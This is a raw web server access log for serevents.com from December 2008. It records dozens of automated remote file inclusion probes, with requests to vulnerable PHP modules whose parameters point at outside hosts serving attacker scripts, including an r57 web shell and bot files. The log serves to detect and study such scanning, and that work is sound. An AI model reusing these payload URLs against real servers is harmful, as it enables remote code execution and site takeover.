207.210.80.210 - - [03/Dec/2008:05:26:07 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "serevents.com"
207.210.80.210 - - [03/Dec/2008:05:26:56 -0800] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "serevents.com"
207.210.80.210 - - [03/Dec/2008:05:26:58 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "serevents.com"
207.210.80.210 - - [03/Dec/2008:05:26:58 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "serevents.com"
72.248.189.82 - - [03/Dec/2008:05:29:59 -0800] "GET /modules/xfsection/modify.php?dir_module=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "serevents.com"
219.85.63.226 - - [03/Dec/2008:05:31:01 -0800] "GET /logs//modules/Forums/admin/admin_users.php?phpbb_root_path=http://www.tos-belarus.org/data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.serevents.com"
219.85.63.226 - - [03/Dec/2008:05:31:01 -0800] "GET /modules/Forums/admin/admin_users.php?phpbb_root_path=http://www.tos-belarus.org/data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.serevents.com"
207.210.80.210 - - [03/Dec/2008:05:32:03 -0800] "GET /logs/access.log%20//modules/vwar/admin/admin.php?vwar_root=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "serevents.com"
219.85.63.226 - - [03/Dec/2008:05:39:03 -0800] "GET /logs//modules/Forums/admin/admin_users.php?phpbb_root_path=http://www.tos-belarus.org/data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "serevents.com"
219.85.63.226 - - [03/Dec/2008:05:39:04 -0800] "GET /modules/Forums/admin/admin_users.php?phpbb_root_path=http://www.tos-belarus.org/data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "serevents.com"
200.212.63.51 - - [03/Dec/2008:05:41:29 -0800] "GET /logs/access.log//errors.php?error=http://www.freewebs.com/albfranci/scan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "serevents.com"
200.212.63.51 - - [03/Dec/2008:05:41:29 -0800] "GET /errors.php?error=http://www.freewebs.com/albfranci/scan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "serevents.com"
200.212.63.51 - - [03/Dec/2008:05:41:29 -0800] "GET /logs//errors.php?error=http://www.freewebs.com/albfranci/scan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "serevents.com"
59.125.183.76 - - [03/Dec/2008:05:46:49 -0800] "GET /logs/access.log//modules/agendax/addevent.inc.php?agendax_path=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "serevents.com"
59.125.183.76 - - [03/Dec/2008:05:46:49 -0800] "GET /modules/agendax/addevent.inc.php?agendax_path=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "serevents.com"
59.125.183.76 - - [03/Dec/2008:05:46:50 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "serevents.com"
62.109.89.253 - - [03/Dec/2008:05:49:05 -0800] "GET /logs//include/write.php?dir=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.serevents.com"
62.109.89.253 - - [03/Dec/2008:05:49:08 -0800] "GET /include/write.php?dir=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.serevents.com"
91.192.20.164 - - [03/Dec/2008:05:56:45 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://computare.freehyperspace5.com/header.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
211.43.212.94 - - [03/Dec/2008:05:57:25 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "serevents.com"
211.43.212.94 - - [03/Dec/2008:05:57:25 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "serevents.com"
211.43.212.94 - - [03/Dec/2008:05:57:25 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "serevents.com"
211.43.212.94 - - [03/Dec/2008:05:57:33 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "serevents.com"
211.43.212.94 - - [03/Dec/2008:05:57:33 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "serevents.com"
211.43.212.94 - - [03/Dec/2008:05:57:33 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "serevents.com"
130.225.61.77 - - [03/Dec/2008:05:58:20 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
130.225.61.77 - - [03/Dec/2008:05:58:20 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
130.225.61.77 - - [03/Dec/2008:05:58:20 -0800] "GET /config/dbutil.bck.php?confdir=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
130.225.61.77 - - [03/Dec/2008:05:58:20 -0800] "GET /config/dbutil.bck.php?confdir=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
72.248.189.82 - - [03/Dec/2008:05:59:00 -0800] "GET /logs/access.log/modules/xfsection/modify.php?dir_module=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "serevents.com"
72.248.189.82 - - [03/Dec/2008:05:59:00 -0800] "GET /modules/xfsection/modify.php?dir_module=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "serevents.com"
72.248.189.82 - - [03/Dec/2008:05:59:00 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "serevents.com"
130.225.61.77 - - [03/Dec/2008:05:59:01 -0800] "GET /config/dbutil.bck.php?confdir=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "serevents.com"
122.153.41.5 - - [03/Dec/2008:05:59:50 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.serevents.com"
122.153.41.5 - - [03/Dec/2008:05:59:51 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.serevents.com"
122.153.41.5 - - [03/Dec/2008:05:59:52 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.serevents.com"
91.192.20.164 - - [03/Dec/2008:06:00:00 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://computare.freehyperspace5.com/header.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
91.192.20.164 - - [03/Dec/2008:06:00:01 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://computare.freehyperspace5.com/header.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
211.43.212.56 - - [03/Dec/2008:06:00:17 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.seanbatt.com/gallery/ee_commerce/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "serevents.com"
211.43.212.56 - - [03/Dec/2008:06:00:17 -0800] "GET /logs/access.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.seanbatt.com/gallery/ee_commerce/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "serevents.com"
211.43.212.56 - - [03/Dec/2008:06:00:18 -0800] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.seanbatt.com/gallery/ee_commerce/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "serevents.com"
12.184.45.114 - - [03/Dec/2008:06:00:27 -0800] "GET /logs/errors.php?error=http://www.zamovsoft.com/89f07f64ff3bedda1ac5c045c69d8866/l333tbi1tX.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.serevents.com"
12.184.45.114 - - [03/Dec/2008:06:00:27 -0800] "GET /errors.php?error=http://www.zamovsoft.com/89f07f64ff3bedda1ac5c045c69d8866/l333tbi1tX.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.serevents.com"
122.153.41.5 - - [03/Dec/2008:06:00:40 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.serevents.com"
218.239.45.154 - - [03/Dec/2008:06:02:24 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.lohby.de/images/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.serevents.com"
218.239.45.154 - - [03/Dec/2008:06:02:24 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.lohby.de/images/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.serevents.com"
211.43.212.56 - - [03/Dec/2008:06:03:40 -0800] "GET /logs/access_081101.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.seanbatt.com/gallery/ee_commerce/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
211.43.212.56 - - [03/Dec/2008:06:03:40 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.seanbatt.com/gallery/ee_commerce/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
211.43.212.56 - - [03/Dec/2008:06:03:43 -0800] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.seanbatt.com/gallery/ee_commerce/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
130.225.61.77 - - [03/Dec/2008:06:04:50 -0800] "GET /config/dbutil.bck.php?confdir=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
72.29.85.242 - - [03/Dec/2008:06:05:43 -0800] "GET /logs/access.log//modules/My_eGallery/index.php?basepath=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "serevents.com"
72.29.85.242 - - [03/Dec/2008:06:05:43 -0800] "GET /modules/My_eGallery/index.php?basepath=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "serevents.com"
72.29.85.242 - - [03/Dec/2008:06:05:43 -0800] "GET /logs//modules/My_eGallery/index.php?basepath=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "serevents.com"
219.83.125.119 - - [03/Dec/2008:06:06:55 -0800] "GET /logs/index.php?option=com_custompages&cpage=http://www.seanbatt.com/gallery/ee_commerce/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
219.83.125.119 - - [03/Dec/2008:06:06:55 -0800] "GET /index.php?option=com_custompages&cpage=http://www.seanbatt.com/gallery/ee_commerce/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
130.225.61.77 - - [03/Dec/2008:06:07:17 -0800] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "serevents.com"
130.225.61.77 - - [03/Dec/2008:06:07:18 -0800] "GET /config/dbutil.bck.php?confdir=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "serevents.com"
130.225.61.77 - - [03/Dec/2008:06:07:18 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "serevents.com"
59.125.183.76 - - [03/Dec/2008:06:07:56 -0800] "GET /logs/access.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
59.125.183.76 - - [03/Dec/2008:06:07:57 -0800] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
59.125.183.76 - - [03/Dec/2008:06:07:57 -0800] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
64.34.166.205 - - [03/Dec/2008:06:09:35 -0800] "GET /modules/xfsection/modify.php?dir_module=http://photoclubus.com/board/my%20.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "serevents.com"
64.34.166.205 - - [03/Dec/2008:06:09:36 -0800] "GET /modules/xfsection/modify.php?dir_module=http://photoclubus.com/board/my%20.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "serevents.com"
64.34.166.205 - - [03/Dec/2008:06:09:36 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://photoclubus.com/board/my%20.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "serevents.com"
64.34.166.205 - - [03/Dec/2008:06:09:41 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://photoclubus.com/board/my%20.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "serevents.com"
130.225.61.77 - - [03/Dec/2008:06:14:35 -0800] "GET /logs/access_081101.log//config/dbutil.bck.php?confdir=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
130.225.61.77 - - [03/Dec/2008:06:14:35 -0800] "GET /config/dbutil.bck.php?confdir=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
130.225.61.77 - - [03/Dec/2008:06:14:35 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
72.15.200.252 - - [03/Dec/2008:06:15:09 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://marista.or.kr/bbs/data/data/id2.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "serevents.com"
72.15.200.252 - - [03/Dec/2008:06:15:10 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://marista.or.kr/bbs/data/data/id2.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "serevents.com"
72.15.200.252 - - [03/Dec/2008:06:15:17 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://marista.or.kr/bbs/data/data/id2.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "serevents.com"
64.34.166.205 - - [03/Dec/2008:06:15:55 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://photoclubus.com/board/my%20.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "serevents.com"
64.34.166.205 - - [03/Dec/2008:06:15:59 -0800] "GET /modules/xfsection/modify.php?dir_module=http://photoclubus.com/board/my%20.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "serevents.com"
218.239.45.154 - - [03/Dec/2008:06:16:26 -0800] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.lohby.de/images/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.serevents.com"
200.212.63.51 - - [03/Dec/2008:06:16:29 -0800] "GET /errors.php?error=http://www.freewebs.com/albfranci/scan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "serevents.com"
113.30.66.5 - - [03/Dec/2008:06:16:45 -0800] "GET /logs/access.log//modules/My_eGallery/index.php?basepath=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "serevents.com"
113.30.66.5 - - [03/Dec/2008:06:16:46 -0800] "GET /logs//modules/My_eGallery/index.php?basepath=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "serevents.com"
113.30.66.5 - - [03/Dec/2008:06:16:46 -0800] "GET /modules/My_eGallery/index.php?basepath=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "serevents.com"
89.111.176.53 - - [03/Dec/2008:06:17:32 -0800] "GET /logs/access.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "serevents.com"
89.111.176.53 - - [03/Dec/2008:06:17:33 -0800] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "serevents.com"
89.111.176.53 - - [03/Dec/2008:06:17:33 -0800] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "serevents.com"
72.15.200.252 - - [03/Dec/2008:06:19:55 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://marista.or.kr/bbs/data/data/id2.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "serevents.com"
72.15.200.252 - - [03/Dec/2008:06:19:55 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://marista.or.kr/bbs/data/data/id2.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "serevents.com"
72.15.200.252 - - [03/Dec/2008:06:19:59 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://marista.or.kr/bbs/data/data/id2.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "serevents.com"
209.90.77.4 - - [03/Dec/2008:06:21:31 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://geocities.com/axenses/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "serevents.com"
209.90.77.4 - - [03/Dec/2008:06:21:31 -0800] "GET /modules/My_eGallery/index.php?basepath=http://geocities.com/axenses/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "serevents.com"
209.90.77.4 - - [03/Dec/2008:06:21:32 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://geocities.com/axenses/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "serevents.com"
113.30.66.5 - - [03/Dec/2008:06:21:46 -0800] "GET /logs//modules/My_eGallery/index.php?basepath=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.serevents.com"
113.30.66.5 - - [03/Dec/2008:06:21:47 -0800] "GET /logs/access.log//modules/My_eGallery/index.php?basepath=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.serevents.com"
113.30.66.5 - - [03/Dec/2008:06:21:47 -0800] "GET /modules/My_eGallery/index.php?basepath=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.serevents.com"
89.111.176.53 - - [03/Dec/2008:06:23:26 -0800] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "serevents.com"
86.109.98.224 - - [03/Dec/2008:06:24:08 -0800] "GET //?_zb_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "serevents.com"
203.228.242.67 - - [03/Dec/2008:06:25:04 -0800] "GET /logs/access.log/errors.php?error=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.serevents.com"
203.228.242.67 - - [03/Dec/2008:06:25:10 -0800] "GET /errors.php?error=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.serevents.com"
203.228.242.67 - - [03/Dec/2008:06:25:15 -0800] "GET /logs/errors.php?error=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.serevents.com"
211.51.221.135 - - [03/Dec/2008:06:33:34 -0800] "GET //?_zb_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "serevents.com"
67.19.105.42 - - [03/Dec/2008:06:41:01 -0800] "GET /logs/errors.php?error=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.serevents.com"
67.19.105.42 - - [03/Dec/2008:06:41:01 -0800] "GET /errors.php?error=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.serevents.com"
67.19.105.42 - - [03/Dec/2008:06:41:02 -0800] "GET /logs/errors.php?error=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.serevents.com"
67.19.105.42 - - [03/Dec/2008:06:41:02 -0800] "GET /errors.php?error=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.serevents.com"
202.214.193.212 - - [03/Dec/2008:06:44:02 -0800] "GET /logs/errors.php?error=http://www.tecfedericotaylor.edu.gt/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
202.214.193.212 - - [03/Dec/2008:06:44:02 -0800] "GET /logs/errors.php?error=http://www.tecfedericotaylor.edu.gt/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
202.214.193.212 - - [03/Dec/2008:06:44:03 -0800] "GET /errors.php?error=http://www.tecfedericotaylor.edu.gt/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
202.214.193.212 - - [03/Dec/2008:06:44:03 -0800] "GET /errors.php?error=http://www.tecfedericotaylor.edu.gt/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
89.111.176.53 - - [03/Dec/2008:06:44:09 -0800] "GET /logs/access.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "serevents.com"
89.111.176.53 - - [03/Dec/2008:06:44:09 -0800] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "serevents.com"
89.111.176.53 - - [03/Dec/2008:06:44:09 -0800] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "serevents.com"
